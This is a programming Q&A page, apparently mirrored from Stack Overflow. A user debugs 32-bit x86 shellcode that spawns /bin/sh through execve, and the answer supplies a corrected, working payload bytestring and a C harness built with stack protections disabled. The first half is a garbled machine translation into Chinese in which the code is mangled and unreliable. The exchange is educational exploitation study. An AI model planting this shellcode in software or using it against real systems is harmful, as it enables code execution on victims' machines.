执行shell code段错误 [英] Executing shellcode segmentation fault
问题描述
我已经编制了一个基本的漏洞(基本上,在C源代码并没有利用什么,只需执行运算codeS其执行的Bash)。问题是,当我执行二进制:段错误
。下面我做了什么:
executeBash.asm(NASM)
.text段
全球_start
_开始:
XOR EAX,EAX; EAX = 0
推EAX; \\ 0 \\ 0 \\ 0 \\ 0
推DWORD 0x68732F2F; // SH
推DWORD 0x6E69622F; / BIN
MOV EBX,ESP; ARG1 =/ bin中// SH \\ 0
推EAX;空 - > ARGS [1]
推EBX; / bin中// SH \\ 0 - > ARGS [0]
MOV ECX,ESP; ARG2 = ARGS []
MOV AL,0x0B中;系统调用11
诠释0x80的; excve(/ bin中//嘘,ARGS [/ bin中//嘘,NULL],NULL)
在终端:
提示符$ NASM -f ELF32 executeBash.asm
提示$ LD -m elf_i386 executeBash.o -o executeBash
提示$ objdump的-M英特尔的i386 -d executeBashexecuteBash:文件格式ELF32-I386
.text段拆卸:08048060< _start计算值:
8048060:31 C0 XOR EAX,EAX
8048062:50推EAX
8048063:68 2F 2F 73 68推0x68732f2f
8048068:68 2F 62 69 6E推0x6e69622f
804806d:89 E3 MOV EBX,ESP
804806f:50推EAX
8048070:53推EBX
8048071:89 E1 MOV ECX,ESP
8048073:B0 0B MOV人,0XB
8048075:CD 80 INT 0x80的
提示$#\\ X31 \\ XC0 \\ X50 \\ X68 \\ X2F \\ X2F \\ X73 \\ X68 \\ X68 \\ X2F \\ X62 \\ X69 \\ x6e \\ X89 \\ XE3 \\ X50 \\ X53 \\ X89 \\ XE1 \\ XB0 \\ X0B \\ XCD \\ X80
提示$ ./executeBash
$退出
提示$
在ASM该漏洞运行完美。
exploitBash.c
无效的主要()
{
焦壳code [] =\\ X31 \\ XC0 \\ X50 \\ X68 \\ X2F \\ X2F \\ X73 \\ X68 \\ X68 \\ X2F \\ X62 \\ X69
\\ x6e \\ X89 \\ XE3 \\ X50 \\ X53 \\ X89 \\ XE1 \\ XB0 \\ X0B \\ XCD \\ X80
无效(* FP)(无效);
FP =(无效*)及外壳code;
FP();
}
提示$ GCC -m32 -fno-堆栈保护-z execstack exploitBash.c -o exploitBash
提示$ ./exploitBash
分段故障
您忘了设置 EDX 使其包含任何的C code最后一次使用它而这不太可能是一个有效的环境指针。在独立code, EDX 正好是零,由于程序的初始启动状态。如果你使用 strace的可以看到的execve 返回 -EFAULT ,然后继续执行过去的code进入垃圾,然后忠实地段错误。您可以修复壳code例如是这样的:
字符外壳code [] =\\ X31 \\ XC0 \\ X50 \\ X68 \\ X2F \\ X2F \\ X73 \\ X68 \\ X68 \\ X2F \\ X62 \\ X69
\\ x6e \\ X89 \\ XE3 \\ X50 \\ X53 \\ X89 \\ XE1 \\ XB0 \\ X0B \\ X31 \\ XD2 \\ XCD \\ X80
(我包括了 XOR EDX,EDX 在 0x80的INT )
I've compiled a basic exploit (basically, the source in C doesn't exploit nothing, simply execute the opcodes which execute Bash). The problem is when I execute the binary: "Segmentation fault".
Here what I've done:
executeBash.asm (NASM)
section .text
global _start
_start:
xor EAX, EAX ; EAX = 0
push EAX ; "\0\0\0\0"
push DWORD 0x68732F2F ; "//sh"
push DWORD 0x6E69622F ; "/bin"
mov EBX, ESP ; arg1 = "/bin//sh\0"
push EAX ; NULL -> args[1]
push EBX ; "/bin//sh\0" -> args[0]
mov ECX, ESP ; arg2 = args[]
mov AL, 0X0B ; syscall 11
int 0x80 ; excve("/bin//sh", args["/bin//sh", NULL], NULL)
In the terminal:
prompt$ nasm -f elf32 executeBash.asm
prompt$ ld -m elf_i386 executeBash.o -o executeBash
prompt$ objdump -M intel,i386 -d executeBash
executeBash: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 50 push eax
8048063: 68 2f 2f 73 68 push 0x68732f2f
8048068: 68 2f 62 69 6e push 0x6e69622f
804806d: 89 e3 mov ebx,esp
804806f: 50 push eax
8048070: 53 push ebx
8048071: 89 e1 mov ecx,esp
8048073: b0 0b mov al,0xb
8048075: cd 80 int 0x80
prompt$ # "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
prompt$ ./executeBash
$ exit
prompt$
The exploit in ASM runs perfectly.
exploitBash.c
void main()
{
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
void(*fp) (void);
fp = (void *)&shellcode;
fp();
}
prompt$ gcc -m32 -fno-stack-protector -z execstack exploitBash.c -o exploitBash
prompt$ ./exploitBash
Segmentation fault
You forgot to set up edx so it contains whatever the C code last used it for and that's unlikely to be a valid environment pointer. In the standalone code, edx happened to be zero due to the initial startup state of the program. If you use strace you can see that the execve returns with -EFAULT and then execution continues past your code into garbage which then truely segfaults. You can fix the shellcode for example like this:
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\x31\xd2\xcd\x80";
(I included a xor edx, edx before the int 0x80.)
这篇关于执行shell code段错误的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
